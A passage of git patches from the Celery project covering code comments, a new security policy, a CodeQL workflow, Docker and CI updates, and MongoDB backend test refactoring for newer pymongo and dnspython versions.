:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
diff --git a/celery/__init__.py b/celery/__init__.py
index 28a7de4f54b..320228e92ca 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0'
+__version__ = '5.2.1'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 0b871532542..50292b1d7aa 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0 (cliffs)
+:Version: 5.2.1 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 120b61578c4103943f5407d3cde4899626143e8c Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Wed, 17 Nov 2021 11:15:26 +0200
Subject: [PATCH 140/177] Comments and questions on celery/canvas.py
---
celery/canvas.py | 25 +++++++++++++++++++++++--
1 file changed, 23 insertions(+), 2 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index 8e9ac136f08..f0bcd2c5260 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -281,14 +281,17 @@ def freeze(self, _id=None, group_id=None, chord=None,
# XXX chord is also a class in outer scope.
opts = self.options
try:
+ # if there is already an id for this task, return it
tid = opts['task_id']
except KeyError:
+ # otherwise, use the _id sent to this function, falling back on a generated UUID
tid = opts['task_id'] = _id or uuid()
if root_id:
opts['root_id'] = root_id
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
+ # fall back on unique ID for this thread in the app
opts['reply_to'] = self.app.thread_oid
if group_id and "group_id" not in opts:
opts['group_id'] = group_id
@@ -676,6 +679,8 @@ def run(self, args=None, kwargs=None, group_id=None, chord=None,
else:
return results_from_prepare[0]
+ # in order for a chain to be frozen, each of the members of the chain individually needs to be frozen
+ # TODO figure out why we are always cloning before freeze
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None, group_index=None):
# pylint: disable=redefined-outer-name
@@ -703,6 +708,7 @@ def prepare_steps(self, args, kwargs, tasks,
use_link = True
steps = deque(tasks)
+ # optimization: now the pop func is a local variable
steps_pop = steps.pop
steps_extend = steps.extend
@@ -717,11 +723,15 @@ def prepare_steps(self, args, kwargs, tasks,
# get the next task in the chain.
while steps:
task = steps_pop()
+ # if steps is not empty, this is the first task - reverse order
+ # if i = 0, this is the last task - again, because we're reversed
is_first_task, is_last_task = not steps, not i
if not isinstance(task, abstract.CallableSignature):
task = from_dict(task, app=app)
if isinstance(task, group):
+ # when groups are nested, they are unrolled - all tasks within
+ # groups within groups should be called in parallel
task = maybe_unroll_group(task)
# first task gets partial args from chain
@@ -734,10 +744,11 @@ def prepare_steps(self, args, kwargs, tasks,
task.args = tuple(args) + tuple(task.args)
if isinstance(task, _chain):
- # splice the chain
+ # splice (unroll) the chain
steps_extend(task.tasks)
continue
+ # TODO why isn't this asserting is_last_task == False?
if isinstance(task, group) and prev_task:
# automatically upgrade group(...) | s to chord(group, s)
# for chords we freeze by pretending it's a normal
@@ -1230,9 +1241,15 @@ def _freeze_group_tasks(self, _id=None, group_id=None, chord=None,
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
if isinstance(self.tasks, _regen):
- # We are draining from a geneator here.
+ # We are draining from a generator here.
+ # tasks1, tasks2 are each a clone of self.tasks
tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks))
+ # freeze each task in tasks1, results now holds AsyncResult for each task
results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id))
+ # TODO figure out why this makes sense -
+ # we freeze all tasks in the clone tasks1, and then zip the results
+ # with the IDs of tasks in the second clone, tasks2. and then, we build
+ # a generator that takes only the task IDs from tasks2.
self.tasks = regen(x[0] for x in zip(tasks2, results))
else:
new_tasks = []
@@ -1265,6 +1282,7 @@ def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id):
for group_index, task in enumerate(tasks))
def _unroll_tasks(self, tasks):
+ # should be refactored to: (maybe_signature(task, app=self._app, clone=True) for task in tasks)
yield from (maybe_signature(task, app=self._app).clone() for task in tasks)
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
@@ -1274,6 +1292,7 @@ def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
group_index = 0
while stack:
task = maybe_signature(stack.popleft(), app=self._app).clone()
+ # if this is a group, flatten it by adding all of the group's tasks to the stack
if isinstance(task, group):
stack.extendleft(task.tasks)
else:
@@ -1364,8 +1383,10 @@ def freeze(self, _id=None, group_id=None, chord=None,
# XXX chord is also a class in outer scope.
if not isinstance(self.tasks, group):
self.tasks = group(self.tasks, app=self.app)
+ # first freeze all tasks in the header
header_result = self.tasks.freeze(
parent_id=parent_id, root_id=root_id, chord=self.body)
+ # secondly freeze all tasks in the body: those that should be called after the header
body_result = self.body.freeze(
_id, root_id=root_id, chord=chord, group_id=group_id,
group_index=group_index)
From b7473f9cb0610c91177b8492753c24f463ea558c Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 19 Nov 2021 11:23:04 +0600
Subject: [PATCH 141/177] create security policy doc
---
SECURITY.md | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 SECURITY.md
diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 00000000000..45213f838de
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,17 @@
+# Security Policy
+
+## Supported Versions
+
+Use this section to tell people about which versions of your project are
+currently being supported with security updates.
+
+| Version | Supported |
+| ------- | ------------------ |
+| 5.2.x | :white_check_mark: |
+| 5.0.x | :x: |
+| 5.1.x | :white_check_mark: |
+| < 5.0 | :x: |
+
+## Reporting a Vulnerability
+
+Please reach out to auvipy@gmail.com & omer.drow@gmail.com for reporting security concerns via email.
From 3c4d4497d6bb3d53120704dc867634e355da74bc Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 19 Nov 2021 11:25:19 +0600
Subject: [PATCH 142/177] create codeql beta
---
.github/workflows/codeql-analysis.yml | 70 +++++++++++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 .github/workflows/codeql-analysis.yml
diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
new file mode 100644
index 00000000000..9f948a98cf9
--- /dev/null
+++ b/.github/workflows/codeql-analysis.yml
@@ -0,0 +1,70 @@
+# For most projects, this workflow file will not need changing; you simply need
+# to commit it to your repository.
+#
+# You may wish to alter this file to override the set of languages analyzed,
+# or to provide custom queries or build logic.
+#
+# ******** NOTE ********
+# We have attempted to detect the languages in your repository. Please check
+# the `language` matrix defined below to confirm you have the correct set of
+# supported CodeQL languages.
+#
+name: "CodeQL"
+
+on:
+ push:
+ branches: [ master ]
+ pull_request:
+ # The branches below must be a subset of the branches above
+ branches: [ master ]
+ schedule:
+ - cron: '18 4 * * 2'
+
+jobs:
+ analyze:
+ name: Analyze
+ runs-on: ubuntu-latest
+ permissions:
+ actions: read
+ contents: read
+ security-events: write
+
+ strategy:
+ fail-fast: false
+ matrix:
+ language: [ 'python' ]
+ # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
+ # Learn more about CodeQL language support at https://git.io/codeql-language-support
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v2
+
+ # Initializes the CodeQL tools for scanning.
+ - name: Initialize CodeQL
+ uses: github/codeql-action/init@v1
+ with:
+ languages: ${{ matrix.language }}
+ # If you wish to specify custom queries, you can do so here or in a config file.
+ # By default, queries listed here will override any specified in a config file.
+ # Prefix the list here with "+" to use these queries and those in the config file.
+ # queries: ./path/to/local/query, your-org/your-repo/queries@main
+
+ # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
+ # If this step fails, then you should remove it and run the build manually (see below)
+ - name: Autobuild
+ uses: github/codeql-action/autobuild@v1
+
+ # ℹ️ Command-line programs to run using the OS shell.
+ # 📚 https://git.io/JvXDl
+
+ # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
+ # and modify them (or add more) to build your code if your project
+ # uses a compiled language
+
+ #- run: |
+ # make bootstrap
+ # make release
+
+ - name: Perform CodeQL Analysis
+ uses: github/codeql-action/analyze@v1
From bc5a87883647a33085fcb25aba95bf721267abc0 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Sun, 21 Nov 2021 19:57:56 +0600
Subject: [PATCH 143/177] start with switching to debian slim image (#6995)
* start with python slim image
* update docker images & python versions
* update package
---
docker/Dockerfile | 20 ++++++++++----------
docker/docker-compose.yml | 8 ++++----
docker/docs/Dockerfile | 2 +-
docker/scripts/install-pyenv.sh | 8 ++++----
4 files changed, 19 insertions(+), 19 deletions(-)
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 0cd557070d0..f7e36e957c4 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,4 +1,4 @@
-FROM ubuntu:focal
+FROM debian:bullseye-slim
ENV PYTHONUNBUFFERED 1
ENV PYTHONIOENCODING UTF-8
@@ -25,7 +25,7 @@ RUN apt-get update && apt-get install -y build-essential \
wget \
pypy3 \
pypy3-lib \
- python-openssl \
+ python3-openssl \
libncursesw5-dev \
zlib1g-dev \
pkg-config \
@@ -66,36 +66,36 @@ COPY --chown=1000:1000 docker/entrypoint /entrypoint
RUN chmod gu+x /entrypoint
# Define the local pyenvs
-RUN pyenv local python3.8 python3.7 python3.6 python3.9
+RUN pyenv local python3.9 python3.8 python3.7 python3.10
-RUN pyenv exec python3.6 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.7 -m pip install --upgrade pip setuptools wheel && \
+RUN pyenv exec python3.9 -m pip install --upgrade pip setuptools wheel && \
pyenv exec python3.8 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.9 -m pip install --upgrade pip setuptools wheel
+ pyenv exec python3.7 -m pip install --upgrade pip setuptools wheel && \
+ pyenv exec python3.10 -m pip install --upgrade pip setuptools wheel
# Setup one celery environment for basic development use
-RUN pyenv exec python3.8 -m pip install \
+RUN pyenv exec python3.9 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.7 -m pip install \
+ pyenv exec python3.8 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.6 -m pip install \
+ pyenv exec python3.7 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.9 -m pip install \
+ pyenv exec python3.10 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
diff --git a/docker/docker-compose.yml b/docker/docker-compose.yml
index 037947f35e0..23256d12301 100644
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -27,16 +27,16 @@ services:
- azurite
rabbit:
- image: rabbitmq:3.8.0
+ image: rabbitmq:3.9
redis:
- image: redis:5.0.6
+ image: redis:6.2
dynamodb:
- image: dwmkerr/dynamodb:38
+ image: amazon/dynamodb-local:latest
azurite:
- image: mcr.microsoft.com/azure-storage/azurite:3.10.0
+ image: mcr.microsoft.com/azure-storage/azurite:latest
docs:
image: celery/docs
diff --git a/docker/docs/Dockerfile b/docker/docs/Dockerfile
index 616919f2b54..711380dde61 100644
--- a/docker/docs/Dockerfile
+++ b/docker/docs/Dockerfile
@@ -1,4 +1,4 @@
-FROM python:3.9-slim-buster
+FROM python:3.9-slim-bullseye
ENV PYTHONUNBUFFERED 1
ENV PYTHONDONTWRITEBYTECODE 1
diff --git a/docker/scripts/install-pyenv.sh b/docker/scripts/install-pyenv.sh
index 2f3093ced10..dcf5f2a6d63 100644
--- a/docker/scripts/install-pyenv.sh
+++ b/docker/scripts/install-pyenv.sh
@@ -7,7 +7,7 @@ curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv
git clone https://github.com/s1341/pyenv-alias.git $(pyenv root)/plugins/pyenv-alias
# Python versions to test against
-VERSION_ALIAS="python3.6" pyenv install 3.6.12
-VERSION_ALIAS="python3.7" pyenv install 3.7.9
-VERSION_ALIAS="python3.8" pyenv install 3.8.7
-VERSION_ALIAS="python3.9" pyenv install 3.9.1
+VERSION_ALIAS="python3.10" pyenv install 3.10.0
+VERSION_ALIAS="python3.7" pyenv install 3.7.12
+VERSION_ALIAS="python3.8" pyenv install 3.8.12
+VERSION_ALIAS="python3.9" pyenv install 3.9.9
From 993b1e62a77c915f72b6e433ffcd9b19e35b712b Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 22 Nov 2021 16:43:10 +0000
Subject: [PATCH 144/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.29.0 → v2.29.1](https://github.com/asottile/pyupgrade/compare/v2.29.0...v2.29.1)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index a542597b1c8..8e2429511ac 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.29.0
+ rev: v2.29.1
hooks:
- id: pyupgrade
args: ["--py37-plus"]
From 29042c91018bfefa36ec4275675f4b50db3b96c3 Mon Sep 17 00:00:00 2001
From: Andrew Ignatov
Date: Wed, 24 Nov 2021 23:22:53 +0200
Subject: [PATCH 145/177] * space added
---
celery/bin/worker.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 7e0d3247ab5..16fffcc794d 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -194,7 +194,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
help_group="Pool Options",
help="Number of child processes processing the queue. "
"The default is the number of CPUs available"
- "on your system.")
+ " on your system.")
@click.option('-P',
'--pool',
default='prefork',
From fad54a99db1aafba505d26c79d7d9368bbeaa4df Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Thu, 25 Nov 2021 11:21:38 +0600
Subject: [PATCH 146/177] unpin redis
---
requirements/extras/redis.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index 6a0c1d208bf..a88793fe8a5 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.4.1,<4.0.0
+redis>=3.4.1,!=4.0.0,!=4.0.1
From f76968936d988b857a52d7ee6bcd829d8cc2d0eb Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 26 Nov 2021 15:02:29 +0600
Subject: [PATCH 147/177] try pypy3.8 beta (#6998)
* try pypy3.8 beta
* try windows latest
---
.github/workflows/python-package.yml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 54fdc3596dc..575650afff1 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -5,14 +5,14 @@ name: Celery
on:
push:
- branches: [ 'master', '5.0' ]
+ branches: [ 'master']
paths:
- '**.py'
- '**.txt'
- '.github/workflows/python-package.yml'
- '**.toml'
pull_request:
- branches: [ 'master', '5.0' ]
+ branches: [ 'master']
paths:
- '**.py'
- '**.txt'
@@ -26,8 +26,8 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7','pypy-3.8']
- os: ["ubuntu-20.04", "windows-2019"]
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7', 'pypy-3.8']
+ os: ["ubuntu-20.04", "windows-latest"]
steps:
- name: Install apt packages
From 398f2f75ae5a51d71238f5b540442e7ea23d1755 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 14:26:47 +0200
Subject: [PATCH 148/177] Upgrade required pymongo version to 3.11.1
---
celery/backends/mongodb.py | 11 +----------
requirements/extras/mongodb.txt | 2 +-
t/unit/backends/test_mongodb.py | 16 ----------------
3 files changed, 2 insertions(+), 27 deletions(-)
diff --git a/celery/backends/mongodb.py b/celery/backends/mongodb.py
index b78e4d015b4..1833561f530 100644
--- a/celery/backends/mongodb.py
+++ b/celery/backends/mongodb.py
@@ -265,16 +265,7 @@ def __reduce__(self, args=(), kwargs=None):
def _get_database(self):
conn = self._get_connection()
- db = conn[self.database_name]
- if self.user and self.password:
- source = self.options.get(
- 'authsource',
- self.database_name or 'admin'
- )
- if not db.authenticate(self.user, self.password, source=source):
- raise ImproperlyConfigured(
- 'Invalid MongoDB username or password.')
- return db
+ return conn[self.database_name]
@cached_property
def database(self):
diff --git a/requirements/extras/mongodb.txt b/requirements/extras/mongodb.txt
index 7ad511e68c5..b2264dfbbe2 100644
--- a/requirements/extras/mongodb.txt
+++ b/requirements/extras/mongodb.txt
@@ -1 +1 @@
-pymongo[srv]>=3.3.0,<3.12.1
+pymongo[srv]>=3.11.1
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index b56e928b026..824a35cbf67 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -273,8 +273,6 @@ def test_get_database_no_existing(self, mock_get_connection):
assert database is mock_database
assert self.backend.__dict__['database'] is mock_database
- mock_database.authenticate.assert_called_once_with(
- MONGODB_USER, MONGODB_PASSWORD, source=self.backend.database_name)
@patch('celery.backends.mongodb.MongoBackend._get_connection')
def test_get_database_no_existing_no_auth(self, mock_get_connection):
@@ -290,7 +288,6 @@ def test_get_database_no_existing_no_auth(self, mock_get_connection):
database = self.backend.database
assert database is mock_database
- mock_database.authenticate.assert_not_called()
assert self.backend.__dict__['database'] is mock_database
@patch('celery.backends.mongodb.MongoBackend._get_database')
@@ -489,19 +486,6 @@ def test_cleanup(self, mock_get_database):
self.backend.cleanup()
mock_collection.delete_many.assert_not_called()
- def test_get_database_authfailure(self):
- x = MongoBackend(app=self.app)
- x._get_connection = Mock()
- conn = x._get_connection.return_value = {}
- db = conn[x.database_name] = Mock()
- db.authenticate.return_value = False
- x.user = 'jerry'
- x.password = 'cere4l'
- with pytest.raises(ImproperlyConfigured):
- x._get_database()
- db.authenticate.assert_called_with('jerry', 'cere4l',
- source=x.database_name)
-
def test_prepare_client_options(self):
with patch('pymongo.version_tuple', new=(3, 0, 3)):
options = self.backend._prepare_client_options()
From b4ac2b109e484982bea4adfebb21d53f9e8edc83 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:31:20 +0200
Subject: [PATCH 149/177] Fix test - separate test_init_mongodb_dns_seedlist
into two tests, one for DNS versions 1.X and another for versions > 2 based
on the pymongo srv_resolver logic
https://github.com/mongodb/mongo-python-driver/blob/e3d1d6f5b48101654a05493fd6eec7fe3fa014bd/pymongo/srv_resolver.py#L38
---
t/unit/backends/test_mongodb.py | 128 +++++++++++++++++++-------------
1 file changed, 75 insertions(+), 53 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 824a35cbf67..2f597aa5cf0 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -1,7 +1,10 @@
+import perform as perform
+
import datetime
from pickle import dumps, loads
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
+import dns.version
import pytest
import pytz
from kombu.exceptions import EncodeError
@@ -25,9 +28,42 @@
MONGODB_DATABASE = 'testing'
MONGODB_COLLECTION = 'collection1'
MONGODB_GROUP_COLLECTION = 'group_collection1'
+# uri with user, password, database name, replica set, DNS seedlist format
+MONGODB_SEEDLIST_URI = ('srv://'
+ 'celeryuser:celerypassword@'
+ 'dns-seedlist-host.example.com/'
+ 'celerydatabase')
+MONGODB_BACKEND_HOST = [
+ 'mongo1.example.com:27017',
+ 'mongo2.example.com:27017',
+ 'mongo3.example.com:27017',
+ ]
+CELERY_USER = 'celeryuser'
+CELERY_PASSWORD = 'celerypassword'
+CELERY_DATABASE = 'celerydatabase'
pytest.importorskip('pymongo')
+def fake_resolver():
+ Name = pytest.importorskip('dns.name').Name
+ TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
+ SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
+
+ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
+
+ if rdtype == 'SRV':
+ return [
+ SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
+ for hostname in [
+ b'mongo1.example.com'.split(b'.'),
+ b'mongo2.example.com'.split(b'.'),
+ b'mongo3.example.com'.split(b'.')
+ ]
+ ]
+ elif rdtype == 'TXT':
+ return [TXT(0, 0, [b'replicaSet=rs0'])]
+
+ return mock_resolver
class test_MongoBackend:
default_url = 'mongodb://uuuu:pwpw@hostname.dom/database'
@@ -86,18 +122,14 @@ def test_init_with_settings(self):
'mongo3.example.com:27017/'
'celerydatabase?replicaSet=rs0')
mb = MongoBackend(app=self.app, url=uri)
- assert mb.mongo_host == [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ assert mb.mongo_host == MONGODB_BACKEND_HOST
assert mb.options == dict(
mb._prepare_client_options(),
replicaset='rs0',
)
- assert mb.user == 'celeryuser'
- assert mb.password == 'celerypassword'
- assert mb.database_name == 'celerydatabase'
+ assert mb.user == CELERY_USER
+ assert mb.password == CELERY_PASSWORD
+ assert mb.database_name == CELERY_DATABASE
# same uri, change some parameters in backend settings
self.app.conf.mongodb_backend_settings = {
@@ -109,65 +141,55 @@ def test_init_with_settings(self):
},
}
mb = MongoBackend(app=self.app, url=uri)
- assert mb.mongo_host == [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ assert mb.mongo_host == MONGODB_BACKEND_HOST
assert mb.options == dict(
mb._prepare_client_options(),
replicaset='rs1',
socketKeepAlive=True,
)
assert mb.user == 'backenduser'
- assert mb.password == 'celerypassword'
+ assert mb.password == CELERY_PASSWORD
assert mb.database_name == 'another_db'
mb = MongoBackend(app=self.app, url='mongodb://')
- def test_init_mongodb_dns_seedlist(self):
- Name = pytest.importorskip('dns.name').Name
- TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
- SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
-
+ @pytest.mark.skipif(dns.version.MAJOR > 1,
+ reason="For dnspython version >= 2, pymongo's"
+ "srv_resolver calls resolver.resolve")
+ def test_init_mongodb_dnspython1_seedlist(self):
+ resolver = fake_resolver()
self.app.conf.mongodb_backend_settings = None
- def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
-
- if rdtype == 'SRV':
- return [
- SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
- for hostname in [
- b'mongo1.example.com'.split(b'.'),
- b'mongo2.example.com'.split(b'.'),
- b'mongo3.example.com'.split(b'.')
- ]
- ]
- elif rdtype == 'TXT':
- return [TXT(0, 0, [b'replicaSet=rs0'])]
+ with patch('dns.resolver.query', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
+ assert mb.options == dict(
+ mb._prepare_client_options(),
+ replicaset='rs0',
+ ssl=True
+ )
- # uri with user, password, database name, replica set,
- # DNS seedlist format
- uri = ('srv://'
- 'celeryuser:celerypassword@'
- 'dns-seedlist-host.example.com/'
- 'celerydatabase')
+ @pytest.mark.skipif(dns.version.MAJOR <= 1,
+ reason="For dnspython versions 1.X, pymongo's"
+ "srv_resolver calls resolver.query")
+ def test_init_mongodb_dnspython2_seedlist(self):
+ resolver = fake_resolver()
+ self.app.conf.mongodb_backend_settings = None
- with patch('dns.resolver.query', side_effect=mock_resolver):
- mb = MongoBackend(app=self.app, url=uri)
- assert mb.mongo_host == [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ with patch('dns.resolver.resolve', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
assert mb.options == dict(
mb._prepare_client_options(),
replicaset='rs0',
- ssl=True
+ tls=True
)
- assert mb.user == 'celeryuser'
- assert mb.password == 'celerypassword'
- assert mb.database_name == 'celerydatabase'
+
+ def perform_seedlist_assertions(self):
+ mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI)
+ assert mb.mongo_host == MONGODB_BACKEND_HOST
+ assert mb.user == CELERY_USER
+ assert mb.password == CELERY_PASSWORD
+ assert mb.database_name == CELERY_DATABASE
+ return mb
def test_ensure_mongodb_uri_compliance(self):
mb = MongoBackend(app=self.app, url=None)
@@ -176,7 +198,7 @@ def test_ensure_mongodb_uri_compliance(self):
assert compliant_uri('mongodb://') == 'mongodb://localhost'
assert compliant_uri('mongodb+something://host') == \
- 'mongodb+something://host'
+ 'mongodb+something://host'
assert compliant_uri('something://host') == 'mongodb+something://host'
@@ -234,8 +256,8 @@ def test_get_connection_with_authmechanism(self):
connection = mb._get_connection()
mock_Connection.assert_called_once_with(
host=['localhost:27017'],
- username='celeryuser',
- password='celerypassword',
+ username=CELERY_USER,
+ password=CELERY_PASSWORD,
authmechanism='SCRAM-SHA-256',
**mb._prepare_client_options()
)
@@ -635,7 +657,7 @@ def find_one(self, task_id):
@pytest.mark.parametrize("serializer,result_type,result", [
(s, type(i['result']), i['result']) for i in SUCCESS_RESULT_TEST_DATA
for s in i['serializers']]
- )
+ )
def test_encode_success_results(self, mongo_backend_factory, serializer,
result_type, result):
backend = mongo_backend_factory(serializer=serializer)
From aabf595beeedc1416b1ba269950e20081279d530 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:32:49 +0200
Subject: [PATCH 150/177] Fix test - separate test_init_mongodb_dns_seedlist
into two tests, one for DNS versions 1.X and another for versions > 2 based
on the pymongo srv_resolver logic
https://github.com/mongodb/mongo-python-driver/blob/e3d1d6f5b48101654a05493fd6eec7fe3fa014bd/pymongo/srv_resolver.py#L38
---
t/unit/backends/test_mongodb.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 2f597aa5cf0..24772639191 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -183,6 +183,7 @@ def test_init_mongodb_dnspython2_seedlist(self):
tls=True
)
+
def perform_seedlist_assertions(self):
mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI)
assert mb.mongo_host == MONGODB_BACKEND_HOST
From 00bcecedb49e7c7dbe1d1968661347544e4d7987 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:33:57 +0200
Subject: [PATCH 151/177] Undo dummy commit
---
t/unit/backends/test_mongodb.py | 1 -
1 file changed, 1 deletion(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 24772639191..2f597aa5cf0 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -183,7 +183,6 @@ def test_init_mongodb_dnspython2_seedlist(self):
tls=True
)
-
def perform_seedlist_assertions(self):
mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI)
assert mb.mongo_host == MONGODB_BACKEND_HOST
From 40af53f96c407ce0c3a5679270f8467994f46e1d Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:43:12 +0200
Subject: [PATCH 152/177] Remove unused import
---
t/unit/backends/test_mongodb.py | 2 --
1 file changed, 2 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 2f597aa5cf0..135222c8ca1 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -1,5 +1,3 @@
-import perform as perform
-
import datetime
from pickle import dumps, loads
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
From 1fa79c6203977cd13545f27749a898a71991e728 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 18:57:26 +0200
Subject: [PATCH 153/177] Divide test cases based on pymongo version: options
returns tls instead of ssl as of pymongo version 4.0 (the values of each are
always identical - they are aliases)
---
t/unit/backends/test_mongodb.py | 45 ++++++++++++++++++++++++++++++---
1 file changed, 42 insertions(+), 3 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 135222c8ca1..f93107d76c8 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -3,6 +3,7 @@
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import dns.version
+import pymongo
import pytest
import pytz
from kombu.exceptions import EncodeError
@@ -152,9 +153,11 @@ def test_init_with_settings(self):
mb = MongoBackend(app=self.app, url='mongodb://')
@pytest.mark.skipif(dns.version.MAJOR > 1,
